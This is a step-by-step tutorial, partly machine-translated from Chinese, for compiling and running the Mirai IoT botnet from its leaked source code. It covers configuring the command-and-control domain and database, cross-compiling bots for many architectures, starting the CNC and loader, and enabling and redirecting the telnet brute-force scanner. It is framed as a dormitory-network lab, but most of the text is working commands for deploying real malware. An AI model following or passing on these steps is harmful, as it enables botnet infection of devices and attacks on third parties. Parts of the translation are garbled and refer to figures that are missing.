1. Preparation
1. Mirai uses two programming languages, C and Go, and uses a database to store data. Therefore, installing the software in advance requires the following commands:
sudo apt-get install git
sudo apt-get install gcc
sudo apt-get install golang sudo apt-get install electric-fence sudo apt-get install mysql-server mysql-client2. Download the source code
git clone https://github.com/jgamblin/Mirai-Source-Code3. Modify parameters and configure CNC
cd mirai/tools && gcc enc.c -o enc.out //编译enc可执行文件,用于ip地址异或
./enc.out string cnc.changeme.com //会返回一串“\x”字符串 (其实就是加密了 cnc.changeme.com) ./enc.out string report.changeme.com //会返回一串“\x”字符串Replace tables.c the "\ x" string and another parameter after line 18 and line 21 in the file, respectively
Remember: to modify two parameters! (Parameters of \ x string and following length)
4. Configure the database
cd ../../scripts //进入script目录
gedit db.sql //编辑大db.sql文件Add touse mirai;如下图
service mysql start //启动Mysql 服务
cat db.sql | mysql -uroot -proot
mysql -uroot -proot //以用户名和密码都是`root`登录数据库
INSERT INTO users VALUES (NULL, 'mirai-user', 'mirai-pass', 0, 0, 0, 0, -1, 1, 30, ''); //添加的用户 exit //退出The mirai/cnc/main.gouser name and password in the modification are the same as those set. After modification, as shown below
5. Configure the cross compilation environment
cd .. && mkdir cross-compmile-bin //这里是在`Mirai-Source-Code`目录下新建
cd cross-compile-binDownload the following 11 compressed packages
wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2(It may be slow. I will put a good one here. Link: https://pan.baidu.com/s/1Z89uaV7boW2SRjIv6Y0Iig
extraction code: 7o34)
cd ../scripts
sudo ./cross-compile.shDuring the compilation process, it will prompt whether to install mysql.
gedit ~/.bashrc //打开环境变量Put the following to the end
export PATH=$PATH:/etc/xcompile/armv4l/bin
export PATH=$PATH:/etc/xcompile/armv5l/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin export GOPATH=$HOME/go
source ~/.bashrc //刷新环境变量6. Compile CNC and bot
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords cd ../mirai ./build.sh debug telnet cd ../loader ./build.shAt this point the environment is fully configured.
2. Explain the
device:
Computer A: As the first infected device. Run ./mirai.dbgscan and blast on port 48101 .
Computer B: As CNC & Loader.
When CNC: Run ./cncattack commands on ports 23 and 101 , and keep connected with the bot.
Loader: ./scanListcontinuous monitoring on port 48101 .
Connection situation:
1 Computers A and B are connected to the dormitory LAN through wifi.
2 Cameras A and B are connected to the dormitory router using switches.
The ultimate goal is to ensure that the four devices are connected to each other under the same network.
3. Test
1. A little adjustment is needed
because cnc startup is performed under the /debug/cncdirectory, but the absolute source is written in the source code. (As shown below)
So we moved to the next miraidirectory . As shownprompt.txt/debug/cnc
2. Start CNC (Computer B)
go build -o debug/cnc cnc/*.go //在mirai 目录下运行
./debug/cncGet as shown:
Open a new terminal and try to connect (may require administrator rights)
telnet cnc.change.com 23After you get the following prompt, press Enter, enter your username and password to log in
Get the feedback in the figure below to indicate successful login!
3 Start the loader (Computer B)
cd mirai/debug
sudo ./scanListenYou can see that the port is running the program by looking at port 48101
netstat -lput // 查看端口指令4 Start the scan program (Computer A).
Since the source code turns off the scanner function in debug mode by default, you can run it after commenting lines 157 and 162 in bot / main.c.
Then recompile and run to run as follows
in the miraidirectory
./build.sh debug telnetmirai/debugRun as follows in the directory (note that you must use administrator rights here)
sudo ./mirai.dbgIt will start scanning as follows:
5 Control scanning ip
Since the source code is to randomly find an ip for blasting ( mirai/bot/scanner.c from line 674), after modifying the code, a ip address scan can be fixed temporarily. After the modification, the first digit is fixed to '10', and the results are as follows:
reference:
Source: Zinc News